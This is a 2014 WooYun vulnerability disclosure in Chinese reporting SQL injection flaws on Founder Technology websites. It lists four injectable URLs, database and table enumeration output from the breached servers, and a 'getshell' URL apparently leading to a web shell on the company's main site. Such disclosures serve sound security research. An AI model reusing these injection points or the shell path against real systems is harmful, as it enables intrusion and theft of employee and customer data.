当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078760

漏洞标题:方正科技集团存在多个SQL注入漏洞可影响海量用户数据

相关厂商:方正科技集团股份有限公司

漏洞作者: 路人甲

提交时间:2014-10-09 16:15

修复时间:2014-11-23 16:16

公开时间:2014-11-23 16:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某大型高科技股份集团多个SQL注入合集,百万数据告急

详细说明:

可跨库,沦陷30多个数据库,泄露数据数百万(内部员工信息,客户信息),疑似被挂马
方正科技集团股份有限公司(简称“方正科技”),是北大方正信息产业集团旗下的内地上市企业
(SH.600601),也是国内最有影响力的高科技上市企业之一

漏洞证明:

注入点:

http://card.foundertech.com/live/driver/Scanner_Name.aspx?name=F300%2fF400%2fF500
http://card.foundertech.com/live/driver/Printer_Name.aspx?name=1000C
http://card.foundertech.com/live/driver/Service_Name.aspx?name=LR200+1100
http://card.foundertech.com/live/driver/Home_Name.aspx?name=%b7%c9%d4%bdA600


26.png


available databases [37]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] CM31
[*] CRMeasy
[*] CRMEasy_His
[*] CRMeasy_TEST
[*] CRMEasy_WebChat
[*] CusData
[*] DatabaseiCRMCore1
[*] FC
[*] FindCustomer
[*] FounderShop
[*] Foundertech
[*] GuangDa
[*] GuoTu
[*] Info
[*] Info23
[*] JinSheng
[*] Kbar
[*] Knowledge
[*] LegaPro
[*] master
[*] model
[*] msdb
[*] OkiKnowledge
[*] Peier
[*] Pfizer
[*] Project
[*] Service
[*] Space_Acer
[*] Space_Data
[*] Space_Gome
[*] Space_HongSan
[*] Space_PKURG
[*] Space_Web
[*] tempdb
[*] Web

27.png


Database: Foundertech
[135 tables]
+---------------------------+
| 7788                      |
| Apabi                     |
| Article                   |
| AutoDrv                   |
| CONTENTMENT               |
| China                     |
| Club                      |
| ClubCCL                   |
| ClubCCL2                  |
| ClubCCL_Record            |
| ClubETime                 |
| ClubETime2                |
| ClubFestival              |
| ClubGift                  |
| ClubGiftApply             |
| ClubGoods                 |
| ClubGoodsApply            |
| ClubGoodsDelivery         |
| ClubGoodsDelivery_bak     |
| ClubGoodsOrder            |
| ClubLife                  |
| ClubMac                   |
| ClubMagzine               |
| ClubMyPic                 |
| ClubPPT                   |
| ClubPPT_Mark              |
| ClubPPT_Point             |
| ClubParm                  |
| ClubPay                   |
| ClubPayDis                |
| ClubPayOrder              |
| ClubPay_20070914          |
| ClubPhoto                 |
| ClubPoint                 |
| ClubPriority              |
| ClubSN                    |
| ClubSPHY                  |
| ClubUpgrade               |
| ClubUser                  |
| ClubUser_20070828         |
| ClubUser_20070914         |
| ClubVip                   |
| Cus_Msg                   |
| D99_CMD                   |
| D99_REG                   |
| D99_Tmp                   |
| DYB                       |
| DYB_20090901_BAK          |
| DYB_20090929_BAK          |
| DYB_2010010401_BAK        |
| DYB_20100104_BAK          |
| DYB_20100504_BAK          |
| Diagnose                  |
| Driver_Acer               |
| Driver_Business           |
| Driver_Business_BAK_MA0   |
| Driver_Digital            |
| Driver_Digital_GPS        |
| Driver_Home               |
| Driver_Home_BAK_MA0       |
| Driver_Home_BAK_OldModel  |
| Driver_Network            |
| Driver_NoteBook_Pl        |
| Driver_Notebook           |
| Driver_PC_Wl              |
| Driver_Part               |
| Driver_Printer            |
| Driver_Record             |
| Driver_SN_Record          |
| Driver_SN_Record2         |
| Driver_Scanner            |
| Driver_Service            |
| Drv                       |
| Drv2                      |
| Drv_Plus                  |
| EMS                       |
| FTWEB_So                  |
| FzMSN                     |
| Goods                     |
| Guarantee                 |
| HelpNow                   |
| HelpNowOrder              |
| HelpNow_Try               |
| Khxw_Award                |
| Khxw_Lotto                |
| Khxw_Lotto2               |
| Khxw_Qu                   |
| Khxw_Qu2                  |
| Khxw_info                 |
| Khxw_info2                |
| Manual                    |
| News                      |
| Pages                     |
| Pages_Detail              |
| Register                  |
| RepairSite                |
| RepairSiteVirtual         |
| RepairSiteVirtualBak      |
| RepairSiteVirtualBak2     |
| RepairSiteVirtualBak3     |
| RepairSiteVirtual_GuangXi |
| SN2Drv                    |
| SN2Drv1210                |
| SN2Drv2                   |
| SN2Drv3                   |
| SN2Drv4                   |
| ServiceCard               |
| ServiceCardLib            |
| ServiceCardReg            |
| ServiceCard_Info          |
| ServiceCard_Market        |
| ServiceCounter            |
| Sheet                     |
| Software                  |
| Station                   |
| Station2                  |
| Station3                  |
| StationNew                |
| Station_Bak201310         |
| Survey                    |
| Tips                      |
| VIP                       |
| VipService                |
| Virus                     |
| Vista                     |
| Vista2                    |
| VistaUpgrade              |
| c_info                    |
| dst2q                     |
| dyb_2010_07_01_bak        |
| dyb_bak_20100601          |
| dyb_temp                  |
| dybupdate_0930            |
| gt                        |
| tempp                     |
+---------------------------+


31.png

32.png

33.png

34.png

35.png

36.png

37.png


28.png


29.png


30.png


getshell地址:

http://www.foundertech.com/ms.aspx

修复方案:

紧急修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)